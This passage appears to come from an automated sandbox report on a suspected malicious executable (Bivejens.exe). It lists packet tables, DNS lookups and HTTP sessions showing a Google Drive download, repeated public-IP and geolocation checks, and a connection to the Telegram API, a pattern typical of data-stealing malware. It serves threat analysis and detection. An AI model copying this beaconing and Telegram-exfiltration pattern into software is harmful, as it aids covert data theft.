Jan 11, 2025 00:41:17.760323048 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.761470079 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.761519909 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.761544943 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.761589050 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.761600971 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.761627913 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.761635065 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.761643887 CET	443	49890	142.250.185.65	192.168.2.10
Jan 11, 2025 00:41:17.761651993 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.761676073 CET	49890	443	192.168.2.10	142.250.185.65
Jan 11, 2025 00:41:17.964957952 CET	49918	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:17.971518040 CET	80	49918	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:17.971596003 CET	49918	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:17.971765041 CET	49918	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:17.978193045 CET	80	49918	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:18.668140888 CET	80	49918	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:18.671976089 CET	49918	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:18.679034948 CET	80	49918	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:18.882368088 CET	80	49918	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:18.936105013 CET	49918	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:19.222908974 CET	49925	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:19.222942114 CET	443	49925	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:19.223026991 CET	49925	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:19.232242107 CET	49925	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:19.232255936 CET	443	49925	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:19.697705030 CET	443	49925	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:19.697896957 CET	49925	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:19.701602936 CET	49925	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:19.701615095 CET	443	49925	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:19.701967955 CET	443	49925	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:19.705786943 CET	49925	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:19.747335911 CET	443	49925	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:19.832273006 CET	443	49925	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:19.832333088 CET	443	49925	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:19.832653999 CET	49925	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:19.838567972 CET	49925	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:19.847266912 CET	49918	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:19.853646994 CET	80	49918	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:20.056885004 CET	80	49918	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:20.059097052 CET	49931	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:20.059145927 CET	443	49931	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:20.059241056 CET	49931	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:20.059497118 CET	49931	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:20.059509993 CET	443	49931	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:20.107914925 CET	49918	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:20.518621922 CET	443	49931	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:20.520440102 CET	49931	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:20.520473957 CET	443	49931	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:20.673469067 CET	443	49931	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:20.673530102 CET	443	49931	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:20.673584938 CET	49931	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:20.674052954 CET	49931	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:20.678193092 CET	49918	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:20.679306030 CET	49937	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:20.683265924 CET	80	49918	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:20.683332920 CET	49918	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:20.684348106 CET	80	49937	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:20.684411049 CET	49937	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:20.684493065 CET	49937	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:20.689268112 CET	80	49937	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:21.355056047 CET	80	49937	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:21.356241941 CET	49943	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:21.356307983 CET	443	49943	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:21.356362104 CET	49943	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:21.356615067 CET	49943	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:21.356632948 CET	443	49943	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:21.404875040 CET	49937	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:21.811398029 CET	443	49943	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:21.813043118 CET	49943	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:21.813139915 CET	443	49943	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:21.953175068 CET	443	49943	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:21.953236103 CET	443	49943	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:21.953313112 CET	49943	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:21.953789949 CET	49943	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:21.958549976 CET	49948	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:21.963356972 CET	80	49948	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:21.963421106 CET	49948	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:21.963527918 CET	49948	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:21.968271017 CET	80	49948	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:22.634099007 CET	80	49948	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:22.635380983 CET	49954	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:22.635483027 CET	443	49954	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:22.635562897 CET	49954	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:22.635812044 CET	49954	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:22.635840893 CET	443	49954	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:22.686008930 CET	49948	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:23.122452974 CET	443	49954	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:23.124187946 CET	49954	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:23.124272108 CET	443	49954	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:23.274528027 CET	443	49954	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:23.274595976 CET	443	49954	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:23.274665117 CET	49954	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:23.275187016 CET	49954	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:23.279354095 CET	49948	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:23.280736923 CET	49960	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:23.286695004 CET	80	49948	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:23.286782026 CET	49948	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:23.287681103 CET	80	49960	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:23.287753105 CET	49960	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:23.287952900 CET	49960	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:23.295037985 CET	80	49960	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:24.006673098 CET	80	49960	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:24.010468960 CET	49963	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:24.010507107 CET	443	49963	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:24.010565996 CET	49963	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:24.010817051 CET	49963	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:24.010831118 CET	443	49963	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:24.061023951 CET	49960	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:24.495986938 CET	443	49963	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:24.498457909 CET	49963	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:24.498481989 CET	443	49963	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:24.680316925 CET	443	49963	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:24.680391073 CET	443	49963	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:24.680546999 CET	49963	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:24.681052923 CET	49963	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:24.685087919 CET	49960	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:24.685923100 CET	49968	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:24.692382097 CET	80	49960	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:24.692446947 CET	49960	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:24.692871094 CET	80	49968	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:24.692953110 CET	49968	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:24.693152905 CET	49968	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:24.700150013 CET	80	49968	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:25.387825012 CET	80	49968	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:25.403605938 CET	49974	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:25.403655052 CET	443	49974	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:25.403723001 CET	49974	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:25.403940916 CET	49974	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:25.403954029 CET	443	49974	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:25.436055899 CET	49968	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:25.862032890 CET	443	49974	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:25.864995956 CET	49974	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:25.865030050 CET	443	49974	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:26.003621101 CET	443	49974	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:26.003690958 CET	443	49974	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:26.003730059 CET	49974	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:26.004117012 CET	49974	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:26.007976055 CET	49968	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:26.009283066 CET	49979	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:26.015259981 CET	80	49968	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:26.015316963 CET	49968	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:26.016222000 CET	80	49979	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:26.016288996 CET	49979	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:26.016401052 CET	49979	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:26.023086071 CET	80	49979	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:26.718538046 CET	80	49979	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:26.720144033 CET	49982	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:26.720257998 CET	443	49982	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:26.720418930 CET	49982	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:26.720671892 CET	49982	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:26.720699072 CET	443	49982	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:26.764219999 CET	49979	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:27.176697969 CET	443	49982	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:27.178950071 CET	49982	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:27.178973913 CET	443	49982	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:27.311352968 CET	443	49982	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:27.311428070 CET	443	49982	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:27.311578989 CET	49982	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:27.311889887 CET	49982	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:27.315448999 CET	49979	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:27.316427946 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:27.320504904 CET	80	49979	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:27.320552111 CET	49979	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:27.321224928 CET	80	49983	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:27.321295023 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:27.321379900 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:27.326200962 CET	80	49983	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:27.994292974 CET	80	49983	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:27.995371103 CET	49984	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:27.995415926 CET	443	49984	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:27.995481014 CET	49984	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:27.995696068 CET	49984	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:27.995708942 CET	443	49984	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:28.045411110 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:28.481540918 CET	443	49984	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:28.534706116 CET	49984	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:28.535784006 CET	49984	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:28.535795927 CET	443	49984	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:28.646405935 CET	443	49984	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:28.646570921 CET	443	49984	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:28.646735907 CET	49984	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:28.647135973 CET	49984	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:28.719079971 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:28.720065117 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:28.725815058 CET	80	49983	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:28.725891113 CET	49983	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:28.726658106 CET	80	49985	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:28.726741076 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:28.727452993 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:28.734060049 CET	80	49985	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:29.410079956 CET	80	49985	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:29.411864042 CET	49986	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:29.411915064 CET	443	49986	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:29.411994934 CET	49986	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:29.412313938 CET	49986	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:29.412327051 CET	443	49986	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:29.451657057 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:29.868765116 CET	443	49986	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:29.870582104 CET	49986	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:29.870611906 CET	443	49986	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:30.016714096 CET	443	49986	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:30.016781092 CET	443	49986	104.21.80.1	192.168.2.10
Jan 11, 2025 00:41:30.016849041 CET	49986	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:30.017297029 CET	49986	443	192.168.2.10	104.21.80.1
Jan 11, 2025 00:41:30.048265934 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:30.054898977 CET	80	49985	132.226.247.73	192.168.2.10
Jan 11, 2025 00:41:30.054960966 CET	49985	80	192.168.2.10	132.226.247.73
Jan 11, 2025 00:41:30.057395935 CET	49987	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:41:30.057429075 CET	443	49987	149.154.167.220	192.168.2.10
Jan 11, 2025 00:41:30.057518959 CET	49987	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:41:30.057987928 CET	49987	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:41:30.058000088 CET	443	49987	149.154.167.220	192.168.2.10
Jan 11, 2025 00:41:30.669203043 CET	443	49987	149.154.167.220	192.168.2.10
Jan 11, 2025 00:41:30.669267893 CET	49987	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:41:30.675964117 CET	49987	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:41:30.675991058 CET	443	49987	149.154.167.220	192.168.2.10
Jan 11, 2025 00:41:30.676248074 CET	443	49987	149.154.167.220	192.168.2.10
Jan 11, 2025 00:41:30.677830935 CET	49987	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:41:30.723330975 CET	443	49987	149.154.167.220	192.168.2.10
Jan 11, 2025 00:41:30.913000107 CET	443	49987	149.154.167.220	192.168.2.10
Jan 11, 2025 00:41:30.913075924 CET	443	49987	149.154.167.220	192.168.2.10
Jan 11, 2025 00:41:30.913177013 CET	49987	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:41:30.919373989 CET	49987	443	192.168.2.10	149.154.167.220
Jan 11, 2025 00:41:37.076623917 CET	49937	80	192.168.2.10	132.226.247.73

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 00:41:12.829164982 CET	55654	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:41:12.835983992 CET	53	55654	1.1.1.1	192.168.2.10
Jan 11, 2025 00:41:13.975204945 CET	51795	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:41:13.986037016 CET	53	51795	1.1.1.1	192.168.2.10
Jan 11, 2025 00:41:17.952950954 CET	56632	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:41:17.961139917 CET	53	56632	1.1.1.1	192.168.2.10
Jan 11, 2025 00:41:19.212218046 CET	53195	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:41:19.221194983 CET	53	53195	1.1.1.1	192.168.2.10
Jan 11, 2025 00:41:30.048609972 CET	52075	53	192.168.2.10	1.1.1.1
Jan 11, 2025 00:41:30.056694031 CET	53	52075	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 00:41:12.829164982 CET	192.168.2.10	1.1.1.1	0xe222	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:13.975204945 CET	192.168.2.10	1.1.1.1	0xb2a9	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:17.952950954 CET	192.168.2.10	1.1.1.1	0x5cb0	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:19.212218046 CET	192.168.2.10	1.1.1.1	0xafef	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:30.048609972 CET	192.168.2.10	1.1.1.1	0x32b2	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 00:40:38.899571896 CET	1.1.1.1	192.168.2.10	0xfacd	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 00:40:38.899571896 CET	1.1.1.1	192.168.2.10	0xfacd	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:12.835983992 CET	1.1.1.1	192.168.2.10	0xe222	No error (0)	drive.google.com		142.250.181.238	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:13.986037016 CET	1.1.1.1	192.168.2.10	0xb2a9	No error (0)	drive.usercontent.google.com		142.250.185.65	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:17.961139917 CET	1.1.1.1	192.168.2.10	0x5cb0	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 11, 2025 00:41:17.961139917 CET	1.1.1.1	192.168.2.10	0x5cb0	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:17.961139917 CET	1.1.1.1	192.168.2.10	0x5cb0	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:17.961139917 CET	1.1.1.1	192.168.2.10	0x5cb0	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:17.961139917 CET	1.1.1.1	192.168.2.10	0x5cb0	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:17.961139917 CET	1.1.1.1	192.168.2.10	0x5cb0	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:19.221194983 CET	1.1.1.1	192.168.2.10	0xafef	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:19.221194983 CET	1.1.1.1	192.168.2.10	0xafef	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:19.221194983 CET	1.1.1.1	192.168.2.10	0xafef	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:19.221194983 CET	1.1.1.1	192.168.2.10	0xafef	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:19.221194983 CET	1.1.1.1	192.168.2.10	0xafef	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:19.221194983 CET	1.1.1.1	192.168.2.10	0xafef	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:19.221194983 CET	1.1.1.1	192.168.2.10	0xafef	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 11, 2025 00:41:30.056694031 CET	1.1.1.1	192.168.2.10	0x32b2	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.10	49918	132.226.247.73	80	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:41:17.971765041 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 11, 2025 00:41:18.668140888 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 00:41:18.671976089 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 00:41:18.882368088 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:18 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 11, 2025 00:41:19.847266912 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 00:41:20.056885004 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:19 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.10	49937	132.226.247.73	80	8056	C:\Users\user\AppData\Local\Temp\Bivejens.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:41:20.684493065 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 11, 2025 00:41:21.355056047 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 23:41:21 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
